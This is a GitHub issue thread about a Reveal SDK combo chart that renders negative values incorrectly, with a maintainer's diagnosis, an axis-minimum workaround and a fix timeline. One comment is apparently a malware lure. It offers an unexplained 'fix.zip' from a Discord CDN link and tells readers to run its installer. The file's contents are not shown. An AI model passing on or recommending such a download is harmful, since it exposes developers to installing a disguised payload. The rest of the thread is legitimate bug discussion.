### ISSUE TITLE
[BUG]: Percentage type value is not showing correct visual in combo chart

### ISSUE THREAD

**Issue by Remmei** [RevealBi/Reveal.Sdk#263]
### SDK Version

1.6.4

### Client Framework

Angular

### Server Platform

ASP.NET

### Operating System

Windows

### Description

We tried using combo ( bar & line) chart for representing two different number types . One thing we observed when it is number is negative , the line chart is giving wrong visualization as shown in below screenshot
**Positive Numbers**
<img width="884" alt="image (1)" src="https://github.com/user-attachments/assets/378eb98f-bb20-48a0-9681-94f02f0f6165">

**Negative Number**
![image (2)](https://github.com/user-attachments/assets/9eea5245-0d75-4d39-8f43-4b8b70e6aa60)

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by TorreyBetts** [comment]
Our category charts internally set an axis minimum of 0 when there wasn't a custom minimum specified in the settings. In the scenario where negative numbers are used the minimum is the lowest value from all series in the chart. However, in the case of the combo chart, we really should be keeping track of the lowest value of the series associated with either axis.

Based on the information above, the workaround until the bug is fixed would be to manually set the axis minimum (and maximum if necessary).

Internally we are tracking this bug with the id of AB#33645.

**Comment by brianlagunas** [comment]
This bug is scheduled to be fixed in our October sprint with release the first week of Nov. Assuming everything goes to plan of course.
